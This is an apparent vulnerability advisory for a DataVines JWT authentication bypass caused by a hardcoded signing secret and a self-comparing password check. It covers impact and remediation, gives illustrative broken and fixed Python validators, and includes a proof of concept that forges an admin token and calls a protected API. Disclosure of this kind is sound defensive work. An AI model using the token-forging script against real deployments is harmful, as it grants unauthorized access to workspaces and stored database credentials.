# Vulnerability Summary: DataVines JWT Authentication Bypass

## Overview

DataVines has a critical JWT authentication bypass vulnerability caused by two combined flaws:

1. **Hardcoded Secret**: The JWT signing key is hardcoded in the code as the default value `asdqwe`, and it is not provided in the configuration file (`application.yaml`), so every default deployment uses the same key.
2. **Self-Comparison Logic**: In the `validateToken` method, the code compares the extracted password with itself (`tokenPassword.equals(tokenPassword2)`), so the validation logic always returns `true`.

## Impact Scope

An attacker only needs to know a valid username (e.g., the default `admin`) to forge a JWT token and completely bypass the authentication mechanism. With a forged token they can:

* Access all protected API endpoints.
* List all workspace and data source configurations (including database credentials).
* Perform arbitrary actions under the impersonated user's identity.
* Access administrator-only features.
* **No valid password or user account required.**

## Remediation

* Refer to Pull Request #579.
* Remove the hardcoded secret and use the key from the configuration file.
* Fix the logic in `validateToken` to ensure the password validation works correctly.

## POC Code

```bash
# Generate a forged token using the known secret "asdqwe" and any fake password
TOKEN=$(python3 -c "
import jwt, time
token = jwt.encode({
    'un': 'admin',
    'up': 'FAKE_PASSWORD',
    'ct': int(time.time()*1000),
    'sub': 'admin',
    'exp': int(time.time()) + 315360000
}, 'asdqwe', algorithm='HS256')
print(token)
")

# Use the forged token to access the protected API
curl -s http://TARGET:9600/api/xd/workspace/list \
  -H "Authorization: Bearer $TOKEN"
# Returns HTTP 200 with workspace data - authentication bypassed
```
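The two flaws and their fixes, as an added example that is not DataVines' own code: a standard-library HS256 verifier with a `validate_token_broken` that mirrors the self-comparison, a `validate_token_fixed` that checks the `up` claim against the stored credential, and a `load_secret` that refuses the hardcoded default. The claim names (`un`, `up`, `exp`) and the default secret come from the advisory; the credential store (username to SHA-256 hex) and the `jwt.secret` config key are assumptions for illustration.

```python
import base64, hashlib, hmac, json, time

DEFAULT_SECRET = "asdqwe"  # the hardcoded default named in the advisory

def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))
def _sign(header: str, body: str, secret: str) -> bytes:
    return hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()

def encode_hs256(claims: dict, secret: str) -> str:
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url(json.dumps(claims).encode())
    return f"{header}.{body}.{_b64url(_sign(header, body, secret))}"

def decode_hs256(token: str, secret: str):
    """Return the claims if the HS256 signature verifies, else None."""
    try:
        header, body, sig = token.split(".")
        if not hmac.compare_digest(_sign(header, body, secret), _b64url_decode(sig)):
            return None
        return json.loads(_b64url_decode(body))
    except ValueError:  # wrong segment count, bad base64 or bad JSON
        return None

def hash_password(password: str) -> str:  # assumed store format: sha256 hex (illustration)
    return hashlib.sha256(password.encode()).hexdigest()

def load_secret(config: dict) -> str:
    """Remediation 1: the key must come from application.yaml and must not be the default."""
    secret = config.get("jwt", {}).get("secret")
    if not secret or secret == DEFAULT_SECRET or len(secret) < 32:
        raise ValueError("jwt.secret must be configured and must not be the default")
    return secret

def validate_token_broken(token: str, secret: str) -> bool:
    """Mirrors the flaw: 'up' is compared with itself, so any token signed with the secret passes."""
    claims = decode_hs256(token, secret)
    if claims is None:
        return False
    token_password, token_password2 = claims.get("up"), claims.get("up")  # same field read twice
    return token_password == token_password2  # always True

def validate_token_fixed(token: str, secret: str, users: dict) -> bool:
    """Remediation 2: compare the 'up' claim against the credential stored for 'un'."""
    claims = decode_hs256(token, secret)
    if claims is None or claims.get("exp", 0) < time.time():
        return False
    stored = users.get(claims.get("un"))
    return stored is not None and hmac.compare_digest(hash_password(str(claims.get("up", ""))), stored)
```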